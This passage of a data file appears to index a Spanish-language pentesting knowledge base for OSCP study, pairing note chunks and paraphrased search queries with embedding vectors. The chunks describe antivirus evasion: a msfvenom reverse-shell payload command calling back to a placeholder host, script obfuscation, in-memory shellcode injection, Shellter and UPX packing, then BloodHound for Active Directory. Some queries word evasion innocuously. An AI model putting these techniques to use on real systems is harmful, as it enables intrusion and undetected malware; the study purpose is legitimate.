"PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Generar y ofuscar\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f powershell -o sc.ps1 # β†’ msfvenom\npython3 ps_encoder.py -s evasion.ps1 # darkoperator/Invoke-Obfuscation\n./chimera.sh -f evasion.ps1 -l 1,2,3 -o out.ps1 # Chimera: ofusca strings/variables\n```", "indexar": "cual programa puedo usar para proteger la visibilidad de las variables de mis scripts", "v": [0.12461, 0.04623, -0.16307, -0.1785, 0.01183, -0.13425, -0.0404, -0.12551, 0.04732, -0.1015, 0.0409, -0.11381, -0.0288, -0.04016, 0.0121, 0.06555, 0.04627, -0.18635, 0.03606, 0.06317, 0.09049, -0.10998, -0.02223, -0.07074, -0.11256, 0.1163, 0.01226, -0.01676, -0.10835, -0.01787, -0.04663, 0.09341, 0.10283, -0.06778, -0.08572, 0.04167, -0.05006, -2e-05, 0.09101, 0.16167, 0.0201, -0.06099, -0.03982, -0.02632, 0.06789, -0.04597, -0.02862, -0.00937, -0.05447, -0.06263, 0.00857, 0.044, -0.08593, -0.0313, 0.0903, -0.03107, -0.01182, -0.13462, -0.09465, 0.02428, -0.07677, 0.00564, 0.07941, -0.00012, 0.05646, -0.08957, 0.03745, -0.03904, -0.16175, 0.06397, 0.03546, 0.00111, 0.02019, 0.00475, 0.07081, 0.08171, -0.06346, -0.12244, 0.06798, -0.02012, -0.12385, 0.05734, -0.01423, 0.11731, -0.11608, -0.11695, -0.01608, -0.061, -0.05103, -0.05555, 0.05868, 0.04282, -0.01195, 0.00982, -0.00139, -0.01928, 0.07412, 0.04875, -0.00288, 0.02852, 0.03111, -0.09445, -0.03319, 0.11177, 0.08281, 0.01223, 0.06636, 0.00809, -0.07522, -0.04314, 0.03983, -0.01197, -0.11804, -0.03582, 0.01876, 0.04475, 0.0153, -0.02862, 0.08613, -0.08137, -0.03268, -0.0409, -0.09273, 0.02921, 0.15375, -0.00176, 0.00877, 0.04914, -0.14382, 0.0303, -0.09408, -0.0516, -0.05465, -0.08278, -0.11386, 0.04858, -0.00819, -0.06342, -0.05053, 0.02148, 0.02687, 0.03865, 0.06562, 0.09535, 0.03672, -0.03223, -0.06802, -0.0527, -0.02792, 0.02644, 0.0478, 0.0066, -0.0602, 0.07455, -0.04527, -0.07286, 0.01581, -0.01717, -0.06547, -0.03537, -0.03057, -0.02576, -0.04325, 0.03132, 0.13395, -0.0616, 0.06312, 0.0189, 0.10015, 0.04997, 0.01085, 0.06827, 0.10828, -0.09466, -0.00781, -0.05895, -0.017, -0.06963, -0.05858, -0.05773, -0.0095, 0.03347, 0.01648, 0.02443, 0.00944, 0.00536, 0.00988, 0.01611, 0.00041, 0.01014, 0.0013, 0.01801, 0.00699, -0.04136, -0.00688, -0.02235, -0.01554, -0.04866, 0.016, -0.02761, -0.07188, 0.02561, 0.03696, -0.04878, 0.0908, 0.07052, -0.03326, -0.01875, 0.01656, 0.00882, 0.06765, -0.00309, 0.06448, 0.02581, -0.03418, -0.04655, -0.01856, 0.08491, 0.03855, -0.02069, 0.02404, -0.01377, 0.01001, -0.00236, -0.02332, -0.06088, 0.01303, 0.02824, -0.03881, 0.00122, -0.02642, -0.01674, -0.06357, 0.02334, 0.00745, 0.01374, -0.06599, -0.01124, -0.00112, -0.06047, -0.02197, 0.09373, -0.0205, -0.10355, -0.01369, -0.0087, -0.07797, 0.02872, 0.0114, -0.02002, -0.01341, 0.02609, 0.04971, -0.06232, 0.01758, 0.00587]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## InyecciΓ³n directa (P/Invoke)\nScript PS que reserva memoria con **VirtualAlloc**, copia el shellcode y lanza **CreateThread** β†’ ejecuta sin escribir un .exe al disco (evade el escaneo on-write).", "indexar": "ΒΏQuΓ© herramienta me sirve para ejecutar cΓ³digo directamente en la memoria sin crear ningΓΊn archivo?", "v": [-0.06558, 0.04548, -0.04935, -0.14023, -0.01229, -0.21854, -0.03396, 0.06025, -0.0879, -0.17975, -0.13336, -0.08035, 0.04548, -0.10373, 0.10672, -0.01422, 0.203, -0.06416, 0.07172, -0.01253, 1e-05, -0.02143, -0.00596, -0.01665, -0.10189, -0.05952, 0.07907, 0.08879, -0.21604, -0.0152, 0.0004, 0.0651, 0.15109, -0.04087, -0.03159, 0.10566, 0.1259, 0.05195, -0.13605, 0.13294, -0.01238, 0.09941, -0.07697, 0.14229, -0.02709, -0.0465, 0.07659, 0.062, 0.04933, 0.05325, -0.0135, -0.072, -0.08857, -0.02002, 0.04189, -0.0915, 0.05201, -0.1915, 0.02998, -0.04439, -0.06165, -0.02111, 0.01865, -0.05105, 0.04325, -0.03071, 0.04459, -0.00827, -0.07845, 0.13487, -0.12582, 0.05883, 0.03703, 0.01778, 0.03597, 0.01101, -0.03337, -0.07047, -0.03513, 0.10715, 0.04389, -0.0485, -0.0441, -0.08955, -0.00857, -0.00687, -0.0084, 0.01532, 0.02152, -0.12125, 0.05739, 0.05984, -0.04715, 0.11424, 0.08489, -0.01355, 0.03957, 0.06408, 0.05866, 0.03841, 0.08421, -0.11289, -0.00871, 0.10852, 0.16195, 0.05356, -0.00357, 0.02375, -0.07791, -0.0136, 0.05877, -0.03895, -0.03147, 0.04235, -0.08609, 0.03759, 0.03757, -0.01142, 0.03159, -0.03321, -0.03761, 0.02935, -0.09349, 0.01942, -0.07277, 0.01116, -0.03346, 0.11464, -0.08285, -0.01805, -0.06918, 0.01437, -0.03295, -0.06709, 0.01695, 0.02981, 0.06968, 0.00759, 0.015, -0.05667, 0.10642, 0.00456, -0.04859, 0.02461, -0.03565, 0.04128, 0.03541, -0.03647, -0.02409, -0.01708, 0.04722, -0.06145, -0.03106, 0.00391, -0.06074, 0.02648, -0.00659, -0.03536, -0.10181, 0.013, -0.0988, 0.04171, -0.03334, -0.01011, 0.00205, -0.09203, -0.03384, 0.03845, 0.0627, 0.02189, 0.05092, -0.05678, 0.05613, -0.09035, 0.0281, -0.03639, -0.08085, -0.012, 0.01179, -0.03009, -0.03321, 0.01858, 0.01623, 0.00451, -0.01982, -0.09114, 0.08461, 0.00497, 0.00379, 0.03589, -0.02637, 0.01292, 0.06991, -0.04466, 0.02766, -0.02265, 0.00808, 0.00699, -0.00623, -0.01085, -0.02421, 0.02371, -0.03499, 0.00673, 0.04053, 0.07696, -0.05329, -2e-05, -0.04499, 0.00941, -0.01, 0.01023, 0.06423, -0.02094, -0.02536, -0.00306, 0.01707, 0.04942, 0.02179, -0.0399, -0.02388, -0.0105, 0.07177, -0.02502, -8e-05, -0.00792, 0.01478, 0.02109, -0.06391, -0.05099, 0.01215, 0.03675, -0.03501, 0.01024, 0.06094, -0.0429, -0.02013, -0.01761, -0.02463, -0.02556, 0.01647, 0.03813, -0.03294, -0.00199, -0.04752, -0.01331, 0.00583, -0.01058, -0.03162, -0.07494, -0.01913, -0.0276, 0.06155, -0.01067, 0.00115, -0.02297]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## InyecciΓ³n directa (P/Invoke)\nScript PS que reserva memoria con **VirtualAlloc**, copia el shellcode y lanza **CreateThread** β†’ ejecuta sin escribir un .exe al disco (evade el escaneo on-write).", "indexar": "Con quΓ© programa puedo lanzar una tarea sin que se guarde nada en el disco?", "v": [-0.08879, 0.04001, -0.2712, 0.05527, -0.05325, 0.00052, 0.02159, 0.0289, -0.12948, -0.0162, -0.00956, -0.09094, -0.07239, -0.09742, 0.00057, 0.09303, 0.08749, 0.13082, 0.05591, -0.03953, -0.02373, -0.05486, 0.05807, -0.16831, 0.06951, -0.12274, 0.04692, -0.06452, -0.07102, 0.04687, -0.09496, 0.00758, 0.09645, -0.13279, 0.0687, 0.0108, 0.03062, 0.02536, 0.07025, -0.01424, 0.01272, -0.02288, 0.00543, 0.07967, 0.03066, -0.07262, 0.15421, -0.00068, 0.10307, -0.01851, -0.01874, 0.01393, 0.00145, -0.13709, 0.02298, -0.19471, 0.02042, -0.02154, 0.00292, 0.03586, -0.05193, 0.09715, 0.09287, -0.02368, 0.06612, 0.0016, 0.12676, -0.07677, -0.00516, 0.0199, -0.02605, -0.00925, 0.09043, -0.0023, -0.02746, 0.07436, 0.01052, 0.00435, -0.01171, -0.076, -0.08544, 0.00772, 0.01397, 0.04158, -0.13075, -0.11156, 0.02881, -0.00842, -0.03793, -0.03147, 0.02829, 0.0679, -0.14497, 0.05326, 0.00411, -0.04337, 0.09721, 0.09506, -0.03587, -0.01572, 0.10573, -0.02878, -0.10037, 0.11962, 0.01326, 0.07079, 0.11438, -0.04333, 0.02541, 0.0687, 0.07025, -0.00493, -0.07734, -0.10688, -0.08654, -0.02316, -0.05251, 0.01544, 0.00098, 0.02502, -0.07556, 0.04577, -0.02167, 0.01479, 0.17448, 0.01723, 0.01672, 0.08068, -0.06529, 0.06764, 0.02678, 0.0406, -0.00382, -0.01654, -0.00373, -0.05669, -0.04725, -0.03119, 0.04009, -0.02682, 0.06459, 0.07585, 0.0346, -0.0093, 0.0351, 0.03023, 0.02545, -0.01999, -0.03712, -0.02777, -0.00517, 0.04679, -0.00807, 0.09022, -0.07797, 0.03099, 0.05854, -0.03231, 0.02762, -0.02342, 0.01273, 0.01876, -0.05946, -0.02742, 0.00326, -0.02195, -0.007, -0.00943, 0.00591, 0.10137, -0.09083, 0.03113, 0.08391, -0.09008, -0.02268, -0.10078, -0.05925, -0.05257, 0.09463, -0.02465, -0.07561, 0.04704, -0.00993, -0.03665, -0.01293, -0.08743, -0.0413, 0.02104, 0.02906, 0.0156, 0.06177, -0.00585, 0.03493, -0.03265, -0.02409, -0.06313, -0.01929, -0.06605, 0.01675, 0.00182, -0.06547, -0.08598, 0.01641, 0.01746, 0.08238, 0.05877, -0.0717, 0.07461, 0.03127, 0.08194, 0.01727, -0.03418, 0.03265, 0.02903, 0.00222, 0.00309, 0.0039, 0.07347, 0.00302, 0.08662, 0.0094, 0.04214, 0.0564, -0.05015, -0.02113, -0.00285, 0.0029, 0.05233, 0.09594, 0.07573, -0.02904, -0.06194, -0.04855, -0.00022, 0.04593, 0.04525, -0.02733, -0.03339, -0.04352, -0.10703, -0.01061, 0.05275, -0.02821, -0.07122, -0.01334, -0.04003, -0.06246, 0.04055, -0.01872, -0.05343, 0.0052, 0.01443, 0.02348, -0.08397, 0.05235, 0.02429]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## InyecciΓ³n directa (P/Invoke)\nScript PS que reserva memoria con **VirtualAlloc**, copia el shellcode y lanza **CreateThread** β†’ ejecuta sin escribir un .exe al disco (evade el escaneo on-write).", "indexar": "Existe algΓΊn script o utilidad para correr shellcode sin generar un .exe al escribirlo?", "v": [-0.13417, 0.04624, -0.18154, -0.12005, 0.00162, -0.19511, -0.12128, 0.03007, 0.0913, -0.09091, -0.15698, -0.06586, -0.02062, -0.04901, 0.10696, -0.12068, 0.01647, -0.0004, -0.03878, -0.02432, -0.04862, -0.01371, -0.0608, -0.05431, -0.00134, 0.06846, -0.1181, 0.0255, -0.01477, -0.00194, -0.0574, 0.15235, 0.1415, -0.10848, -0.05826, 0.00174, 0.03647, -0.03375, 0.01916, 0.1404, 0.00881, 0.11788, -0.14671, 0.12279, 0.03597, 0.01177, 0.04344, 0.05023, 0.08446, -0.00091, 0.10632, -0.07994, -0.0792, -0.03096, 0.03356, 0.08451, 0.09631, -0.13509, -0.04388, -0.04363, -0.05127, -0.02327, -0.003, -0.03841, 0.0017, 0.03041, 0.0278, -0.06205, -0.13429, -0.02408, -0.02463, 0.08565, -0.15981, 0.0815, -0.00207, -0.09973, -0.10549, -0.06449, 0.05412, 0.12229, -0.03588, -0.0663, -0.05248, -0.01316, -0.02476, -0.06825, -0.05767, -0.05453, 0.02965, 0.00244, 0.08583, -0.0622, -0.04233, -0.01052, -0.03444, -0.0233, 0.0539, 0.02688, -0.00599, 0.16985, -0.07656, -0.02174, -0.01649, 0.08957, 0.02911, 0.04964, 0.04828, 0.03522, 0.07779, 0.06421, 0.00601, -0.08659, -0.04792, 0.02296, -0.03972, -0.03054, -0.04408, -0.03793, 0.00188, -0.06973, -0.07007, 0.01363, -0.06614, -0.00477, -0.05049, -0.04986, 0.01279, 0.04292, 0.01872, 0.04298, -0.02601, -0.03368, -0.04428, -0.0638, -0.11502, 0.10687, 0.02649, 0.08407, -0.06883, -0.04685, 0.08403, -0.01258, -0.04504, 0.07335, -0.10262, 0.05872, -0.03276, -0.03401, -0.0402, 0.01423, 0.01385, -0.03433, -0.07176, 0.04438, -0.03882, -0.07997, 0.04977, 0.04149, -0.04507, -0.01979, -0.09529, -0.00542, -0.04845, 0.00827, -0.04652, -0.02408, 0.02245, -0.0577, 0.04282, 0.08081, -0.03889, 0.06042, 0.05698, -0.09187, 0.09742, -0.0639, 0.02351, -0.03625, 0.01189, -0.04212, 0.02003, -0.01211, 0.03441, 0.01981, -0.02719, 0.00691, 0.09585, 0.03877, -0.0623, 0.0455, 0.01804, 0.02917, -0.00334, -0.13085, 0.00583, -0.02295, 0.01482, -0.05792, 0.07786, -0.05885, -0.13417, 0.01683, 0.0098, 0.00594, 0.08506, 0.04074, -0.07284, -0.00483, 0.00715, 0.01209, 0.05228, -0.00334, -0.03549, 0.06107, 0.02319, 0.01316, 0.07009, 0.04173, 0.01844, -0.05098, 0.01369, 0.01565, 0.02285, -0.00753, 0.04586, -0.014, 0.04962, -0.01626, 0.02684, 0.01781, -0.03648, -0.01286, -0.00159, 0.05093, -0.00265, 0.01175, -0.01547, -0.03478, 0.00921, -0.0312, -0.05136, 0.03199, -0.03981, -0.08979, -0.02892, 0.04341, -0.01972, 0.01374, -0.07071, -0.03347, -0.03913, -0.02541, -0.03235, 0.02768, 0.03783, 0.03226]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Otras tools\n- **Shellter** (inyecta en un .exe legΓ­timo), **Veil**, **Nim/C# loaders**.\n- **UPX** para empaquetar y cambiar la firma: `upx -9 rev.exe`.\n\n> Nota OSCP: la evasiΓ³n de AV estΓ‘ permitida (no es un escΓ‘ner de vulns prohibido β†’ Reglas de herramientas); rara vez hace falta en el examen, pero alguna mΓ‘quina la pide.\n\nRelacionado: Client-side attacks Β· msfvenom Β· Reverse shell Β· OSCP MOC", "indexar": "quΓ© herramienta sirve para empaquetar ejecutables y cambiar su firma digital?", "v": [-0.00144, 0.0772, -0.18196, -0.04217, 0.13701, -0.11755, -0.06786, 0.00983, -0.10288, -0.13445, -0.14998, -0.1214, 0.01521, -0.15539, 0.01085, 0.01072, 0.0257, -0.16662, 0.00906, -0.04284, 0.07703, 0.03946, -0.03809, -0.15642, -0.11941, -0.01247, -0.04426, 0.01394, -0.2591, 0.1331, 0.03349, 0.05518, 0.07705, -0.12049, -0.00959, -0.0293, 0.04207, -0.00262, 0.10157, 0.08876, 0.04556, 0.06514, -0.06618, 0.06087, 0.01065, 0.0465, 0.0304, -0.01, -0.0067, 0.11373, -0.07861, -0.06366, -0.18381, -0.01177, 0.02238, -0.03071, 0.18917, -0.15965, 0.08223, -0.08587, -0.08987, -0.04081, -0.07948, 0.01077, 0.0631, 0.01373, -0.03456, -0.08813, -0.04823, 0.04245, -0.04703, -0.02816, 0.01297, 0.01884, -0.04029, -0.07963, 0.04538, -0.03436, 0.00369, 0.02179, 0.04087, -0.02717, -0.15486, 0.04389, 0.0307, -0.07218, -0.05981, -0.08088, 0.02417, -0.05542, 0.06243, 0.08222, 0.07836, -0.00276, -0.00604, 0.01155, 0.08516, -0.05697, -0.04351, 0.02243, 0.16755, 0.0039, -0.10778, -0.00355, -0.09547, 0.03228, -0.0924, 0.0139, -0.06595, -0.02825, 0.03117, 0.01329, -0.00027, -0.01402, -0.01867, -0.00739, 0.03917, -0.07584, -0.01373, -0.01705, 0.02392, 0.01649, -0.04834, -0.00905, -0.02796, 0.01278, 0.03761, 0.03592, -0.01661, -0.05906, 0.00916, -0.07699, -0.05657, -0.02118, -0.01673, -0.01844, -0.002, -0.05689, 0.00371, -0.11313, 0.054, 0.03429, -0.02317, -0.03918, 0.0215, -0.01185, 0.09025, -0.05469, -0.06604, 0.08653, 0.03119, -0.07245, -0.04663, 0.04901, -0.09795, 0.00973, -0.0491, 0.01177, -0.1006, 0.08218, -0.05249, -0.10349, 0.01668, 0.00859, 0.00677, -0.0329, 0.00244, 0.06411, 0.0825, 0.03987, 0.01858, 0.02149, 0.02087, -0.01941, 0.00361, -0.05144, -0.09944, 0.02053, 0.05222, -0.01269, -0.04304, 0.02017, 0.03392, 0.06246, 0.04405, 0.00333, 0.03477, -0.048, -0.05239, 0.05209, 0.02527, 0.00134, -0.05052, -0.04359, 0.02699, -0.02004, -0.02498, -0.04775, -0.00919, -0.01557, -0.0527, -0.03643, -0.02006, -0.04041, 0.04259, 0.07448, -0.01493, 0.00055, -0.00701, 0.05771, 0.01599, -0.05519, 0.02292, 0.01793, -0.07637, -0.05565, 0.01296, 0.05472, 0.03544, 0.08265, 0.0307, -0.07615, 0.04606, -0.04593, -0.00133, 0.07546, 0.02661, -0.0018, -0.05877, -0.04956, 0.00949, 0.01068, -0.00442, -0.01901, -0.00486, -0.02798, 0.04999, 0.00124, -0.0609, -0.02851, 0.00368, 0.05015, -0.06148, 0.01032, -0.01848, -0.01133, -0.05904, -0.00939, -0.02273, -0.01, -0.06109, 0.00192, 0.02177, -0.02514, -0.01713, 0.01706]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Otras tools\n- **Shellter** (inyecta en un .exe legΓ­timo), **Veil**, **Nim/C# loaders**.\n- **UPX** para empaquetar y cambiar la firma: `upx -9 rev.exe`.\n\n> Nota OSCP: la evasiΓ³n de AV estΓ‘ permitida (no es un escΓ‘ner de vulns prohibido β†’ Reglas de herramientas); rara vez hace falta en el examen, pero alguna mΓ‘quina la pide.\n\nRelacionado: Client-side attacks Β· msfvenom Β· Reverse shell Β· OSCP MOC", "indexar": "con quΓ© puedo inyectar cΓ³digo en un programa .exe legΓ­timo para crear una reverse shell?", "v": [-0.02513, -0.0182, -0.09317, 0.01467, 0.11344, -0.17917, -0.01756, 0.04791, -0.05172, -0.09191, -0.11233, -0.07468, -0.02238, -0.15678, 0.02905, 0.00089, 0.00959, -0.12755, 0.03019, -0.00935, -0.01407, -0.04296, -0.05277, -0.09924, 0.00255, 0.08154, -0.07192, 0.10175, -0.05094, -0.05299, -0.0546, 0.00584, 0.08342, -0.07494, 0.00212, 0.08465, 0.16323, 0.01893, -0.00884, 0.1481, 0.07349, 0.01834, -0.15249, 0.12866, 0.0067, -0.02294, 0.12967, 0.04328, 0.09532, -0.04872, -0.03567, -0.08502, -0.1527, 0.02814, 0.17101, -0.05925, 0.04737, -0.19999, -0.05291, 0.01543, -0.05338, -0.01406, 0.07871, -0.03848, 0.03186, -0.02651, 0.09292, -0.04767, -0.08032, -0.02628, -0.05333, 0.03944, -0.03018, -0.04118, -0.00849, -0.03266, -0.07831, -0.12257, 0.0192, 0.02583, -0.05899, 0.00248, -0.02131, -0.03344, 0.01083, -0.02389, 0.00398, -0.0729, 0.0066, -0.08853, 0.1079, 0.02853, 0.03756, 0.1286, 0.03825, -0.07837, 0.06736, 0.0593, -0.01224, 0.06888, -0.02688, -0.07115, -0.03627, 0.14068, 0.08047, 0.06873, -0.01504, 0.00223, -0.05731, 0.10539, -0.03519, -0.06994, -0.10028, 0.03094, -0.06034, -0.05604, -0.08364, 0.02012, 0.03748, -0.05603, -0.10151, 0.03796, -0.10093, 0.0536, 0.02057, 0.02551, -0.02135, 0.18757, -0.07278, -0.00799, -0.03381, -0.05855, 0.01326, -0.0517, -0.04848, 0.0365, 0.07915, 0.03976, 0.00173, 0.00425, 0.03069, 0.09426, 0.05395, 0.10639, -0.03391, 0.00291, -0.00552, -0.09006, -0.02688, -0.02011, 0.07025, 0.07254, -0.03757, 0.07367, -0.11676, -0.00086, -0.01013, 0.01733, -0.03116, -0.01284, -0.10231, 0.04721, -0.0297, -0.01522, 0.0189, -0.02162, -0.04236, -0.00495, 0.05313, 0.06366, -0.04497, 0.05327, 0.12717, -0.0773, 0.05075, -0.00715, 0.01994, -0.08145, 0.01203, -0.07105, -0.00963, 0.02047, 0.10457, -0.0212, -0.00189, -0.02479, -0.0022, 0.11656, -0.00831, 0.0257, -0.01144, 0.04589, -0.01895, -0.02296, 0.00393, 0.00899, 0.03314, -0.05467, 0.03592, -0.02228, -0.0526, 0.05569, 0.04966, -0.05944, 0.02482, 0.04982, -0.08591, 0.03487, 0.02228, 0.06445, 0.02297, -0.01825, 0.07208, 0.06693, -0.02943, 0.02357, 0.02501, 0.05829, 0.05019, 0.02697, -0.00305, -0.01713, 0.02107, 0.01462, 0.00304, -0.09824, 0.03235, 0.03304, 0.00794, 0.02641, -0.02441, -0.0193, -0.0113, -0.01398, 0.01886, 0.05139, 0.00593, -0.03533, 0.0116, -0.04382, 0.00512, 0.07419, -0.02727, -0.08574, 0.01255, 0.02818, -0.03312, -0.01948, -0.00113, 9e-05, -0.06943, 0.00773, 0.03258, -0.06915, 0.02624, 8e-05]} +{"tipo": "pregunta", "herramienta": "AV evasion", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/AV evasion.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "## Otras tools\n- **Shellter** (inyecta en un .exe legΓ­timo), **Veil**, **Nim/C# loaders**.\n- **UPX** para empaquetar y cambiar la firma: `upx -9 rev.exe`.\n\n> Nota OSCP: la evasiΓ³n de AV estΓ‘ permitida (no es un escΓ‘ner de vulns prohibido β†’ Reglas de herramientas); rara vez hace falta en el examen, pero alguna mΓ‘quina la pide.\n\nRelacionado: Client-side attacks Β· msfvenom Β· Reverse shell Β· OSCP MOC", "indexar": "cuΓ‘les son las alternativas libres a Veil o Nim/C# loaders para evadir antivirus?", "v": [0.06471, -0.07589, -0.05967, 0.1257, -0.00929, -0.02616, -0.02083, -0.05396, -0.11622, -0.06077, 0.03695, -0.35683, -0.06058, -0.01403, 0.14495, 0.03349, 0.00877, -0.19915, 0.08599, 0.17963, -0.09086, 0.01422, -0.11487, -0.04296, -0.04042, 0.19422, -0.05161, 0.07894, -0.08238, 0.00533, -0.05422, 0.01799, 0.15893, -0.00106, -0.03485, 0.0686, -0.03141, -0.02779, -0.05932, 0.02745, 0.06376, 0.04081, -0.03949, 0.01068, 0.00978, -0.17577, -0.12735, -0.0808, 0.1145, -0.04713, -0.08898, 0.10588, 0.01642, -0.05978, -0.03656, -0.09458, -0.01384, -0.00851, 0.02692, -0.05271, -0.08604, 0.15362, 0.07273, 0.04755, 0.04339, -0.0678, -0.08823, -0.07491, -0.09121, -0.01802, 0.02155, 0.05776, 0.02357, -0.052, 0.00926, -0.03209, -0.05684, 0.00073, -0.01883, 0.08578, 0.12287, -0.05021, 0.0074, -0.06072, -0.06531, 0.00739, 0.08263, -0.0726, -0.04953, 0.02656, 0.03659, -0.05996, -0.01758, 0.099, -0.01768, -0.04142, 0.0449, 0.03484, -0.01021, -0.00744, 0.06049, 0.00103, -0.0787, 0.03167, -0.05483, -0.08655, -0.01426, -0.06918, -0.06469, 0.01236, 0.06437, -0.02982, -0.05797, -0.00586, -0.01505, -0.09197, 0.02061, -0.07429, -0.03568, -0.03848, -0.00329, -0.0056, -0.06292, -0.01848, 0.09614, 0.04708, 0.0568, 0.11501, -0.05099, -0.0459, -0.00076, -0.12013, -0.02039, -0.04352, -0.06941, -0.00738, 0.06604, -0.05442, 0.01212, 0.04568, 0.03036, -0.01582, 0.03836, 0.05479, 0.06576, 0.00328, -0.00075, -0.03052, -0.05422, -0.05793, 0.07843, 0.01153, 0.0172, 0.05234, -0.03845, 0.0342, -0.06533, -0.03044, -0.00651, 0.04156, 0.03063, 0.00553, 0.00437, -0.02535, 0.01452, 0.00638, -0.00377, -8e-05, -0.0597, 0.06939, 0.00977, 0.04747, 0.03401, -0.10641, -0.01887, -0.04604, 0.067, -0.06862, 0.04536, -0.00045, 0.00981, 0.01001, -0.03402, 0.02862, -0.02383, -0.09387, 0.02174, -0.00095, 0.06968, 0.08421, -0.04161, 0.00301, -0.05101, -0.07786, 0.01099, -0.0167, 0.00195, -0.08999, 0.04099, 0.05939, -0.07806, -0.06452, -0.04402, -0.06257, 0.08145, 0.11489, 0.00883, -0.03845, 0.00439, 0.02339, 0.02229, 0.01053, 0.04292, -0.01316, -0.05306, -0.0456, -0.01468, -0.06818, 0.03324, -0.00665, 0.03527, 0.03266, 0.01946, -0.06703, -0.01785, 0.05487, -0.00749, 0.02878, 0.06057, -0.0117, -0.00066, 0.00014, -0.01215, -0.03437, 0.00214, 0.04663, 0.0035, 0.01697, -0.00691, 0.00997, 0.03751, 0.04095, 0.04643, -0.04725, -0.02127, -0.05117, 0.0165, 0.03054, -0.02566, -0.00517, -0.02204, 0.05608, -0.01022, -0.01599, 0.01463, -0.00961]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# BloodHound\n\n> Dibuja Active Directory **como un grafo**: nodos = usuarios/grupos/mΓ‘quinas, aristas = relaciones. Le preguntas \"ΒΏcamino mΓ‘s corto de juan a Domain Admins?\" y te lo pinta. La ΓΊnica tool con GUI propia.", "indexar": "que programa permite ver las relaciones entre usuarios y grupos en Active Directory?", "v": [-0.08055, 0.13313, -0.02882, -0.29753, -0.03411, -0.0532, -0.00564, -0.05159, -0.04359, -0.04769, 0.083, -0.08545, -0.03686, -0.08456, 0.08226, -0.05404, 0.07127, -0.03886, 0.01534, -0.00971, -0.01375, -0.00165, 0.01356, 0.02342, -0.00355, 0.06257, 0.03048, -0.06595, 0.13211, 0.04857, 0.03001, -0.09321, -0.00585, -0.07292, 0.02281, -0.06526, 0.00617, 0.0349, 0.0971, 0.04914, -0.0993, -0.08753, -0.13678, -0.06906, 0.12416, 0.14703, -0.08407, -0.09585, 0.05008, 0.05793, -0.1064, 0.04074, -0.07254, 0.03062, -0.00444, -0.09017, -0.00366, -0.08303, -0.03346, -0.0374, -0.07156, -0.05485, 0.00352, -0.03109, -0.00232, -0.00712, 0.18679, -0.00261, -0.13313, 0.13572, 0.03251, -0.04926, -0.01349, 0.07133, 0.019, 0.02835, 0.0492, 0.01191, -0.16815, -0.03164, 0.07416, 0.03159, 0.10189, 0.05532, -0.08423, -0.06025, 0.07503, -0.00376, -0.02891, -0.00153, 0.12434, 0.11444, 0.01177, 0.02979, 0.09459, -0.04496, 0.02829, 0.0368, 0.10853, 0.00769, 0.07599, -0.02497, -0.04318, 0.15505, -0.06072, 0.07598, 0.0057, 0.04645, -0.04138, 0.08728, 0.01655, -0.04482, 0.07251, -0.09946, 0.03123, 0.06605, -0.02463, -0.03171, 0.04203, -0.05328, -0.12711, -0.03148, 0.00344, 0.02538, 0.05546, 0.01141, 0.04996, 0.08397, -0.04942, 0.10939, -0.04659, 0.03083, -0.03416, -0.09429, -0.04619, -0.11422, -0.02924, 0.08034, 0.06816, -0.09081, -0.00241, 0.04692, 0.00345, -0.03067, 0.02113, -0.02309, -0.02143, -0.01352, 0.02269, 0.06014, 0.00683, 0.02494, -0.08778, 0.01746, -0.00858, 0.02164, -0.07881, -0.02805, -0.04166, -0.03914, 0.0143, -0.02402, 0.04222, -0.08474, 0.06757, -0.00845, -0.12016, -0.01608, 0.0681, 0.12535, -0.00262, 0.05196, 0.07897, -0.03344, 0.01199, -0.0055, 0.06899, -0.04401, 0.05062, 0.00897, -0.00224, -0.01028, 0.02944, 0.00302, -0.00812, -0.03629, -0.10219, 0.02956, 0.04007, -0.01238, -0.04438, 0.06658, 0.01912, -0.02204, 0.00494, -0.06985, -0.02184, 0.01121, 0.02427, -0.06731, 0.04116, -0.04847, 0.08848, 0.00965, -0.00647, 0.02578, -0.01584, 0.03567, 0.11741, 0.04133, 0.00025, -0.00928, 0.05258, 0.03315, -0.09481, -0.0383, 0.01427, 0.01471, 0.06401, 0.03972, -0.03323, 0.0212, 0.05919, -0.01252, 0.07425, -0.05854, -0.00328, -0.01156, -0.00754, 0.00887, -0.02182, -0.07893, 0.01338, -0.06976, 0.09971, -0.00383, 0.02737, -0.06104, -0.01148, -0.04858, 0.02598, 0.05504, 0.04151, 0.00479, -0.0832, -0.00375, -0.0367, 0.03179, -0.01715, -0.03625, -0.01065, 0.01463, 0.03317, -0.06483, 0.01208, 0.0315]} +{"tipo": "pregunta", "herramienta": "BloodHound", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/BloodHound.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# BloodHound\n\n> Dibuja Active Directory **como un grafo**: nodos = usuarios/grupos/mΓ‘quinas, aristas = relaciones. Le preguntas \"ΒΏcamino mΓ‘s corto de juan a Domain Admins?\" y te lo pinta. La ΓΊnica tool con GUI propia.", "indexar": "con que puedo dibujar un grafo de nodos y aristas para visualizar una red corporativa?", "v": [0.09562, -0.07622, -0.08661, -0.05517, 0.14269, 0.00791, 